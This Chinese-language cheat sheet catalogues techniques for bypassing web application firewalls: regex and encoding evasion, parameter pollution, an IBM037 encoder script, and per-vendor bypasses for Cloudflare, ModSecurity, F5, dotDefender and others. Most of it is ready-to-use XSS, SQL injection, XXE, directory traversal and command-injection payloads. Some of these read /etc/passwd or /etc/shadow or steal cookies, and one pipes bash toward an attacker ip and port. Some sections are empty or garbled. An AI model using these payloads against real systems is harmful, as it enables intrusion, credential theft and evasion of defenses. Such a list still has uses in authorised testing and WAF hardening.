0X00    Fuzz/爆破

fuzz字典

1.Seclists/Fuzzing

https://github.com/danielmiessler/SecLists/tree/master/Fuzzing

2.Fuzz-DB/Attack

https://github.com/fuzzdb-project/fuzzdb/tree/master/attack

3.Other Payloads 可能会被ban ip，小心为妙。

https://github.com/foospidy/payloads

0X01    正则绕过

多少waf 使用正则匹配。

黑名单检测/bypass

Case: SQL 注入

• Step 1:

过滤关键词: and, or, union
可能正则: preg_match('/(and|or|union)/i', $id)
被拦截的语句: union select user, password from users bypass语句: 1 || (select user from users where user_id = 1) = 'admin'

• Step 2:

过滤关键词: and, or, union, where
被拦截的语句: 1 || (select user from users where user_id = 1) = 'admin' bypass语句: 1 || (select user from users limit 1) = 'admin'

• Step 3:

过滤关键词: and, or, union, where, limit
被拦截的语句: 1 || (select user from users limit 1) = 'admin' bypass语句: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

• Step 4:

过滤关键词: and, or, union, where, limit, group by
被拦截的语句: 1 || (select user from users group by user_id having user_id = 1) = 'admin' bypass语句: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1

• Step 5:

过滤关键词: and, or, union, where, limit, group by, select 被拦截的语句: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 bypass语句: 1 || 1 = 1 into outfile 'result.txt' bypass语句: 1 || substr(user,1,1) = 'a'

• Step 6:

过滤关键词: and, or, union, where, limit, group by, select, '

被拦截的语句: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 bypass语句: 1 || user_id is not null
bypass语句: 1 || substr(user,1,1) = 0x61 bypass语句: 1 || substr(user,1,1) = unhex(61)

• Step 7:

过滤关键词: and, or, union, where, limit, group by, select, ', hex
被拦截的语句: 1 || substr(user,1,1) = unhex(61)

bypass语句: 1 || substr(user,1,1) = lower(conv(11,10,36))

• Step 8:

过滤关键词: and, or, union, where, limit, group by, select, ', hex, substr
被拦截的语句: 1 || substr(user,1,1) = lower(conv(11,10,36))

bypass语句: 1 || lpad(user,7,1)

• Step 9:

过滤关键词: and, or, union, where, limit, group by, select, ', hex, substr, white space
被拦截的语句: 1 || lpad(user,7,1)

bypass语句: 1%0b||%0blpad(user,7,1)

[出自:jiwo.org]

0X02        混淆/编码

1. 大小写

标准: <script>alert()</script> Bypassed: <ScRipT>alert()</sCRipT> 标准: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME' Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'

2. URL 编码

被阻断语句: <svG/x=">"/oNloaD=confirm()// Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F

被阻断语句: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

3. Unicode 编码

标准: <marquee onstart=prompt()>
混淆: <marquee onstart=\u0070r\u06f\u006dpt()>

被阻断语句: /?redir=http://google.com
Bypassed: /?redir=http://google。com (Unicode 替代)

被阻断语句: <marquee loop=1 onfinish=alert()>x
Bypassed: ＜marquee loop＝1 onfinish＝alert︵1)>x (Unicode 替代)

TIP: 查看这些说明 this and this reports on HackerOne. :)

4. HTML 实体编码

标准: "><img src=x onerror=confirm()> Encoded: &quot;&gt;&lt;img src=x onerror=confirm&lpar;&rpar;&gt; (General form)
Encoded: &#34;&#62;&#60;img src=x onerror=confirm&#40;&#41;&#62; (Numeric reference)

5. 混合编码

Sometimes, WAF rules often tend to filter out a specific type of encoding.

This type of filters can be bypassed by mixed encoding payloads.

Tabs and newlines further add to obfuscation.

混淆:

<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

7. 双重URL编码

这个需要服务端多次解析了url编码

标准: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\ 混淆: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\ 标准: <script>alert()</script> 混淆: %253Cscript%253Ealert()%253C%252Fscript%253E

8. 通配符使用

用于linux命令语句注入，通过shell通配符绕过

标准: /bin/cat /etc/passwd
混淆: /???/??t /???/??ss??
Used chars: / ? t s

标准: /bin/nc 127.0.0.1 1337 混淆: /???/n? 2130706433 1337 Used chars: / ? n [0-9]

9. 动态payload 生成

标准: <script>alert()</script> 混淆: <script>eval('al'+'er'+'t()')</script> 标准: /bin/cat /etc/passwd
混淆: /bi'n'''/c''at' /e'tc'/pa''ss'wd

Bash allows path concatenation for execution.

标准: <iframe/onload='this["src"]="javascript：alert()"';>
混淆: <iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>

9. 垃圾字符

Normal payloads get filtered out easily.
Adding some junk chars helps avoid detection (specific cases only).
They often help in confusing regex based firewalls.


标准: <script>alert()</script> 混淆: <script>+-+-1-+-+alert(1)</script> 标准: <BODY onload=alert()> 混淆: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>

NOTE: 上述语句可能会破坏正则的匹配，达到绕过。

标准: <a href=javascript;alert()>ClickMe
Bypassed: <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

10. 插入换行符

部分waf可能会对换行符没有匹配

标准: <iframe src=javascript：confirm(0)"> 混淆: <iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">

11. 未定义变量

bash 和 perl 执行脚本中加入未定义变量，干扰正则。

TIP: 随便写个不存在的变量就好。$aaaa,$sdayuhjbsad,$dad2ed都可以。

Level 1 Obfuscation: Normal
标准: /bin/cat /etc/passwd
混淆: /bin/cat$u /etc/passwd$u

Level 2 Obfuscation: Postion Based
标准: /bin/cat /etc/passwd
混淆: $u/bin$u/cat$u $u/etc$u/passwd$u

Level 3 Obfuscation: Random characters
标准: /bin/cat /etc/passwd
混淆: $aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff

一个精心制作的payload

$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf

12. Tab 键和换行符

大多数waf匹配的是空格不是Tab

标准: <IMG SRC="javascript：alert();"> Bypassed: <IMG SRC=" javascript：alert();"> 变形: <IMG SRC=" jav ascri pt:alert ();"> 标准: http://test.com/test?id=1 union select 1,2,3
标准: http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3

标准: <iframe src=javascript：alert(1)></iframe> 混淆: <iframe    src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

13. Token Breakers(翻译不了 看起来说的就是sql注入闭合)

Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers.
Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.
However, the request must still remain valid while using token-breakers.

Case: Unknown Token for the Tokenizer

Payload: ?id=‘-sqlite_version() UNION SELECT password FROM users -- Case: Unknown Context for the Parser (Notice the uncontexted bracket)

Payload 1: ?id=123);DROP TABLE users -- Payload 2: ?id=1337) INTO OUTFILE ‘xxx’ --

TIP: 更多payload可以看这里 cheat sheet.

14. 其他格式混淆

许多web应用程序支持不同的编码类型(如下表)

混淆成服务器可解析、waf不可解析的编码类型

Case: IIS

IIS6, 7.5, 8 and 10 (ASPX v4.x) 允许 IBM037 字符

可以发送编码后的参数名和值

原始请求:

POST /sample.aspx?id1=something HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 41

id2='union all select * from users--

混淆请求 + URL Encoding:

POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=ibm037 Content-Length: 115 %89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60

TIP: 可以使用 这个小脚本 来转化编码

import urllib.parse, sys from argparse import ArgumentParser
lackofart = '''
        OBFUSCATOR
''' def paramEncode(params="", charset="", encodeEqualSign=False, encodeAmpersand=False, urlDecodeInput=True, urlEncodeOutput=True):     result = ""     equalSign = "="     ampersand = "&"     if '=' and '&' in params:
        if encodeEqualSign:
            equalSign = equalSign.encode(charset)
        if encodeAmpersand:
            ampersand = ampersand.encode(charset)
        params_list = params.split("&")
        for param_pair in params_list:
            param, value = param_pair.split("=")
            if urlDecodeInput:
                param = urllib.parse.unquote(param)
                value = urllib.parse.unquote(value)
            param = param.encode(charset)
            value = value.encode(charset)
            if urlEncodeOutput:
                param = urllib.parse.quote_plus(param)
                value = urllib.parse.quote_plus(value)
            if result:
                result += ampersand
            result += param + equalSign + value
    else:
        if urlDecodeInput:
            params = urllib.parse.unquote(params)
        result = params.encode(charset)
        if urlEncodeOutput:
            result = urllib.parse.quote_plus(result)
    return result def main():     print(lackofart)
    parser = ArgumentParser('python3 obfu.py')
    parser._action_groups.pop()

    # A simple hack to have required arguments and optional arguments separately     required = parser.add_argument_group('Required Arguments')
    optional = parser.add_argument_group('Optional Arguments')

    # Required Options     required.add_argument('-s', '--str', help='String to obfuscate', dest='str')
    required.add_argument('-e', '--enc', help='Encoding type. eg: ibm037, utf16, etc', dest='enc')

    # Optional Arguments (main stuff and necessary)     optional.add_argument('-ueo', help='URL Encode Output', dest='ueo', action='store_true')
    optional.add_argument('-udi', help='URL Decode Input', dest='udi', action='store_true')
    args = parser.parse_args()
    if not len(sys.argv) > 1:
        parser.print_help()
        quit()
    print('Input: %s' % (args.str))
    print('Output: %s' % (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=args.udi, urlEncodeOutput=args.ueo))) if __name__ == '__main__':
    main()

	

		

			

				服务器信息
			
			

				可用编码
			
			

				说明
			
		
	
	

		

			

				Nginx, uWSGI-Django-Python3
			
			

				IBM037, IBM500, cp875, IBM1026, IBM273
			
			

				对参数名和参数值进行编码

服务器会对参数名和参数值均进行url解码

需要对等号和& and进行编码(不进行url编码)
			
		
		

			

				Nginx, uWSGI-Django-Python2
			
			

				IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424
			
			

				对参数名和参数值进行便慢慢

服务器会对参数名和参数值均进行url解码

等号和&符号不应该以任何方式编码。
			
		
		

			

				Apache-TOMCAT8-JVM1.8-JSP
			
			

				IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025
			
			

				参数名按原始格式(可以像往常一样使用url编码)

Body 不论是否经过url编码均可

等号和&符号不应该以任何方式编码
			
		
		

			

				Apache-TOMCAT7-JVM1.6-JSP
			
			

				IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025
			
			

				参数名按原始格式(可以像往常一样使用url编码)

Body 不论是否经过url编码均可

等号和&符号不应该以任何方式编码
			
		
		

			

				IIS6, 7.5, 8, 10 -ASPX (v4.x)
			
			

				IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025
			
			

				参数名按原始格式(可以像往常一样使用url编码)

Body 不论是否经过url编码均可

等号和&符号不应该以任何方式编码
			
		
	


	0X04        HTTP 参数污染


	手法

这种攻击方法基于服务器如何解释具有相同名称的参数
可能造成bypass的情况:
服务器使用最后接收到的参数，WAF只检查第一个参数
服务器将来自类似参数的值联合起来，WAF单独检查它们

	下面是相关服务器对参数解释的比较


	

		

			

				环境
			
			

				参数解析
			
			

				示例
			
		
	
	

		

			

				ASP/IIS
			
			

				用逗号连接
			
			

				par1=val1,val2
			
		
		

			

				JSP, Servlet/Apache Tomcat
			
			

				第一个参数是结果
			
			

				par1=val1
			
		
		

			

				ASP.NET/IIS
			
			

				用逗号连接
			
			

				par1=val1,val2
			
		
		

			

				PHP/Zeus
			
			

				最后一个参数是结果
			
			

				par1=val2
			
		
		

			

				PHP/Apache
			
			

				最后一个参数是结果
			
			

				par1=val2
			
		
		

			

				JSP, Servlet/Jetty
			
			

				第一个参数是结果
			
			

				par1=val1
			
		
		

			

				IBM Lotus Domino
			
			

				第一个参数是结果
			
			

				par1=val1
			
		
		

			

				IBM HTTP Server
			
			

				最后一个参数是结果
			
			

				par1=val2
			
		
		

			

				mod_perl, libapeq2/Apache
			
			

				第一个参数是结果
			
			

				par1=val1
			
		
		

			

				Oracle Application Server 10G
			
			

				第一个参数是结果
			
			

				par1=val1
			
		
		

			

				Perl CGI/Apache
			
			

				第一个参数是结果
			
			

				par1=val1
			
		
		

			

				Python/Zope
			
			

				第一个参数是结果
			
			

				par1=val1
			
		
		

			

				IceWarp
			
			

				返回一个列表
			
			

				[‘val1’,’val2’]
			
		
		

			

				AXIS 2400
			
			

				最后一个参数是结果
			
			

				par1=val2
			
		
		

			

				DBMan
			
			

				由两个波浪号连接起来
			
			

				par1=val1~~val2
			
		
		

			

				mod-wsgi (Python)/Apache
			
			

				返回一个列表
			
			

				ARRAY(0x8b9058c)
			
		
	




	0X05        浏览器的缺陷


	Charset Bugs:

可以尝试 修改 charset header to 更高的 Unicode (eg. UTF-32)

当网站解码的时候，触发payload
Example request:

 
GET /page.php?p=∀㸀㰀script㸀alert(1)㰀/script㸀 HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept-Charset:utf-32; q=0.5< Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate

	当站点加载时，将其编码为我们设置的UTF-32编码，然后由于页面的输出编码为UTF-8，将其呈现为:"<script>alert (1) </ script> 从而触发xss


	完整url编码后的 payload:

%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80 

	Null 空字节

Payload 示例: <scri%00pt>alert(1);</scri%00pt>  <scri\x00pt>alert(1);</scri%00pt> <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t> 标准: <a href="javascript：alert()"> 混淆: <a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a> 变形: <a 0x00 href="javascript：alert(1)">clickme</a>

RFC 声明节点名不可以由空白起始

但是我们可以使用特殊字符 ` %, //, !, ?`, etc.

例子: <// style=x:expression\28write(1)\29> - Works upto IE7 (Source) <!--[if]><script>alert(1)</script --> - Works upto IE9 (Reference) <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> - Works in IE7 (Reference) <%div%20style=xss:expression(prompt(1))> - Works Upto IE7

Opera: 0x09, 0x20, 0x2C, 0x3B

Android: 0x09, 0x20, 0x28, 0x2C, 0x3B

示例

<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>pwn3d

使用其他非典型等效语法结构替换

找的waf开发人员没有注意到的语句进行攻击

一些WAF开发人员忽略的常见关键字:

• JavaScript functions:

• window

• parent

• this

• self

• Tag attributes:

• onwheel

• ontoggle

• onfilterchange

• onbeforescriptexecute

• ondragstart

• onauxclick

• onpointerover

• srcdoc

SQL Operators

lpad

lpad( string, padded_length, [ pad_string ] ) lpad函数从左边对字符串使用指定的字符进行填充
  lpad('tech', 7); 将返回' tech'
  lpad('tech', 2); 将返回'te'
  lpad('tech', 8, '0'); 将返回'0000tech'
  lpad('tech on the net', 15, 'z'); 将返回'tech on the net'
  lpad('tech on the net', 16, 'z'); 将返回'ztech on the net

field

FIELD(str,str1,str2,str3,...)
返回的索引（从1开始的位置）的str在str1，str2，STR3，...列表中。如果str没有找到，则返回0。
+---------------------------------------------------------+
| FIELD('ej', 'Hej', 'ej', 'Heja', 'hej', 'foo') |
+---------------------------------------------------------+
| 2                                                       |
+---------------------------------------------------------+

	bit_count 二进制数中包含1的个数。BIT_COUNT(10);因为10转成二进制是1010，所以该结果就是2

Case: XSS
<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
Case: SQLi
SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null);
1%0b||%0bLPAD(USER,7,1)
可以使用许多替代原生JavaScript的方法:

JSFuck

JJEncode

XChars.JS

滥用SSL/TLS密码:

Tool: abuse-ssl-bypass-waf

滥用 DNS 记录:

• 找到云waf后的源站

TIP: 一些在线资源 IP History 和 DNS Trails

bash bypass-firewalls-by-DNS-history.sh -d <target> --checkall

请求头欺骗

让waf以为请求来自于内部网络，进而不对其进行过滤。

添加如下请求头

Google Dorks Approach:

应对已知WAF的绕过

搜索语法:

Normal search:

SQLi Overlong UTF-8 Sequence Bypass (>= v4.2.4) by @Sec Consult

%C0%80'+union+select+col1,col2,col3+from+table+--+

"; select * from TARGET_TABLE --
XSS Bypass by @kmkz

<script>eval(atob(decodeURIComponent("payload")))//

<body style="height:1000px" onwheel="alert(1)"> <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)"> <b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)> 

GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US

Host: favoritewaf.com

User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)

XSS Bypass by @0xInfection

<a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere

Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit) by @xort 

Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit) by @xort

Cerber (WordPress)

Username Enumeration Protection Bypass by HTTP Verb Tampering by @ed0x21son

POST host.com HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT) author=1

Protected Admin Scripts Bypass by @ed0x21son

http://host/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils http://host/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar

REST API Disable Bypass by @ed0x21son

http://host/index.php/wp-json/wp/v2/users/

Citrix NetScaler

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
        <string>’ union select current_user, 2#</string>
    </soapenv:Body>
</soapenv:Envelope>
generic_api_call.pl XSS by @NNPoster

http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document。cookie)%3c/script%3e%3cscript%3e
	

		Cloudflare 
	

	

		HTML Injection by @spyerror
	
<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
	

		XSS Bypass by @c0d3g33k
	
<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>
	

		XSS Bypasses by @Bohdan Korzhynskyi
	
<svg onload=prompt%26%230000000040document.domain)> <svg onload=prompt%26%23x000000028;document.domain)> xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> 1'"><img/src/onerror=.1|alert``>
	

		XSS Bypass by @RakeshMane10
	
<svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
	

		XSS Bypass by @ArbazKiraak
	
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>`
	

		XSS Bypass by @Ahmet Ümit
	
<--`<img/src=` onerror=confirm``> --!>


	

		XSS Bypass by @Shiva Krishna 
	
javascript:{alert`0`}
	

		XSS Bypass by @Brute Logic
	
<base href=//knoxss.me?
	

		XSS Bypass by @RenwaX23 (Chrome only)
	
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
	

		RCE Payload Detection Bypass by @theMiddle
	
cat$u+/etc$u/passwd$u /bin$u/bash$u <ip> <port> ";cat+/etc/passwd+# 
	

		Comodo
	
	

		XSS Bypass by @0xInfection 
	
<input/oninput='new Function`confir\u006d\`0\``'> <p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
	

		SQLi by @WAFNinja 
	
0 union/**/select 1,version(),@@datadir

	

		DotDefender
	
	

		Firewall disable by (v5.0) by @hyp3rlinx
	
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+ <enabled>false</enabled>
	

		Remote Command Execution (v3.8-5) by @John Dos
	
POST /dotDefender/index.cgi HTTP/1.1 Host: 172.16.159.132 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Authorization: Basic YWRtaW46 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 95 sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15
	

		Persistent XSS (v4.0) by @EnableSecurity 
	
GET /c?a=<script> HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 <script>alert(1)</script>: aa
Keep-Alive: 300

	

		R-XSS Bypass by @WAFNinja 
	
<svg/onload=prompt(1);> <isindex action="javas&tab;cript:alert(1)" type=image> <marquee/onstart=confirm(2)> 
	

		XSS Bypass by @0xInfection 
	
<p draggable=True ondragstart=prompt()>alert <bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme
GET - XSS Bypass (v4.02) by @DavidK

/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E <img src="WTF" onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B
h%2Bn)(/0wn3d/.source)" />
	

		POST - XSS Bypass (v4.02) by @DavidK
	
<img src="WTF" onError="{var {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/
.source)" />
clave XSS (v4.02) by @DavidK 
/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{


	

		Fortinet Fortiweb
	
	

		pcre_expression unvaidated XSS by @Benjamin Mejri 
	
/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0 

	

		CSP Bypass by @Binar10
	
	

		POST Type Query 
	
POST /<path>/login-app.aspx HTTP/1.1 Host: <host> User-Agent: <any valid user agent string> Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: <the content length must be at least 2399 bytes> var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes>

	

		GET Type Query 
	
http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data> 
	

		F5 ASM
	
	

		XSS Bypass by @WAFNinja 
	
<table background="javascript：alert(1)"></table> "/><marquee onfinish=confirm(123)>a</marquee> 

	

		F5 BIG-IP
	
	

		XSS Bypass by @WAFNinja 
	
<body style="height:1000px" onwheel="[DATA]"> <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]"> <body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)"> <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)"> 

	

		XSS Bypass by @Aatif Khan 
	
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss"onshow="prom%25%32%33%25%32%36x70;t(1)“> 

	

		report_type XSS by @NNPoster 
	
https://host/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+


	

		POST Based XXE by @Anonymous 
	
POST /sam/admin/vpe2/public/php/server.php HTTP/1.1 Host: bigip Cookie: BIGIPAuthCookie=*VALID_COOKIE* Content-Length: 143 <?xml version="1.0" encoding='utf-8' ?> <!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]> <message><dialogueType>&e;</dialogueType></message> 

	

		Directory Traversal by @Anastasios Monachos
	
	

		Read Arbitrary File 
	
/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd

	

		Delete Arbitrary File 
	

POST /tmui/Control/form HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, 
deflate Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; 
f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd  Content-Type: application/x-www-form-urlencoded _form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=
&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before= %2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=
Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete


	

		F5 FirePass
	
	

		SQLi Bypass from @Anonymous 
	
state=%2527+and+
(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+


	

		ModSecurity
	
	

		RCE Payloads Detection Bypass for PL3 by @theMiddle (v3.1) 
	
;+$u+cat+/etc$u/passwd$u 

	

		RCE Payloads Detection Bypass for PL2 by @theMiddle (v3.1) 
	
;+$u+cat+/etc$u/passwd+\# 

	

		RCE Payloads for PL1 and PL2 by @theMiddle (v3.0) 
	
/???/??t+/???/??ss??


	

		RCE Payloads for PL3 by @theMiddle (v3.0) 
	
/?in/cat+/et?/passw?


	

		SQLi Bypass by @Johannes Dahse (v2.2) 
	
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user


	

		SQLi Bypass by @Yuri Goltsev (v2.2) 
	
1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')


	

		SQLi Bypass by @Ahmad Maulana (v2.2) 
	
1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-

